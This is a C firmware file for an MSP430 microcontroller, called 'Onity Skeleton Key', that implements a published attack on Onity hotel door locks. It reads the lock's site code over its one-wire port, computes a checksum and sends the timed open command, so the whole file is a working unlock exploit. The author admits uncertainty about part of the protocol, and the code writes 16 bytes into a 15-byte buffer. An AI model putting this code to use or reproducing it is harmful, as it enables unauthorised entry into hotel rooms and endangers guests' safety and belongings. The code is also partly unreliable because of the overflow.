/* OSK - Onity Skeleton Key
 * 
 * This is an implementation of the open door hack as described on
 * http://demoseen.com/bhpaper.html
 * 
 * Rather than port the arduino code I started from scratch and 
 * attempted to follow the procedure as outline on the paper.
 * 
 * I'm not 100% sure I got the site code reading bit correct. I assumed
 * the site code was the first 4 bytes read from the lock's memory at
 * the given address.
 * 
 * Special thanks to David Siroky <siroky@dasir.cz> for the wonderful
 * msp430 OneWire library.
 * 
 */

#include <msp430.h>
#include "delay.h"
#include "onewire.h"

#define COMM BIT0
#define LED BIT6


int main()
{
	int i, j;
	
	unsigned char buf[15];
	
	/* stop watchdog */
	WDTCTL = WDTPW + WDTHOLD;
	
	/* load calibration settings */
	BCSCTL1 = CALBC1_8MHZ;
	DCOCTL = CALDCO_8MHZ;
	
	/* setup the LED */
	P1DIR |= LED;
	
	/* turn on the LED to let user know MCU is running */
	P1OUT |= LED;
	
	/* setup one wire comm */
	onewire_t ow;
	
	ow.port_out = &P1OUT;
	ow.port_in = &P1IN;
	ow.port_ren = &P1REN;
	ow.port_dir = &P1DIR;
	ow.pin = COMM;
	
	/* begin communication */
	
	/* send read command */
	for(i=0; i < 5; i++)
		onewire_write_byte(&ow, 0b00000000);
	onewire_write_byte(&ow, 0b10100011);
	onewire_write_byte(&ow, 0b11100000);
	onewire_write_byte(&ow, 0b00100001);
	onewire_write_byte(&ow, 0b00010011);
	for(i=0; i < 4; i++)
		onewire_write_bit(&ow, 0);

	/* read command sent, actually read the response */
	for(i=0; i<13; i++) /* first 13 bits are junk, read and discard */
		onewire_read_bit(&ow);
	for(i=0; i<16; i++) /* actual data, 16 bytes spaced with a bit in between */
	{
		buf[i] = onewire_read_byte(&ow);
		onewire_read_bit(&ow); /* read and discard spacer bit */
	}
	onewire_read_byte(&ow); /* read last checksum byte (and discard, who gives a shit?) */
	
	/* the site code is in the 1st, 2nd, 3rd, and 4th bytes.
	 * the rest doesn't matter so we'll use the 5th byte of buf to
	 * store the checksum */
	 
	buf[4] = buf[0] ^ buf[1] ^ buf[2] ^ buf[3] ^ 0xDD; /* xor'd with magic 0xdd */
	
	/* we have the site code. now let's send the open command.
	 * the open command consists of several groups that need to
	 * be spaced out by 2700 microseconds */
	
	/* first group */
	for(i=0; i<40; i++)
		onewire_write_bit(&ow, 0);
	onewire_write_byte(&ow, 0b10100010);
	onewire_write_bit(&ow, 0);
	onewire_write_bit(&ow, 1);
	for(i=0; i<4; i++)
	{
		onewire_write_byte(&ow, buf[i]); /* send sitecode byte */
		onewire_write_bit(&ow, 1); /* send spacer bit */
	}
	onewire_write_byte(&ow, buf[4]); /* send checksum byte (not followed by spacer bit) */
	for(i=0; i<50; i++)
		onewire_write_bit(&ow, 0);
	DELAY_US(2700);
	
	/* the next 9 groups are each 49 zeroes. no really. */
	for(i=0; i<9; i++)
	{
		for(j=0; j<49; j++)
			onewire_write_bit(&ow, 0);
		DELAY_US(2700);
	}
	
	/* final group for open command */
	for(i=0; i<40; i++)
		onewire_write_bit(&ow, 0);
	onewire_write_byte(&ow, 0b10011010);
	onewire_write_byte(&ow, 0b11110010);
	onewire_write_bit(&ow, 1);
	onewire_write_bit(&ow, 0);
	
		
	/* blink LED to let user know MCU is done running */
	for(;;)
	{
		P1OUT ^= LED;
		DELAY_MS(500);
	}
}
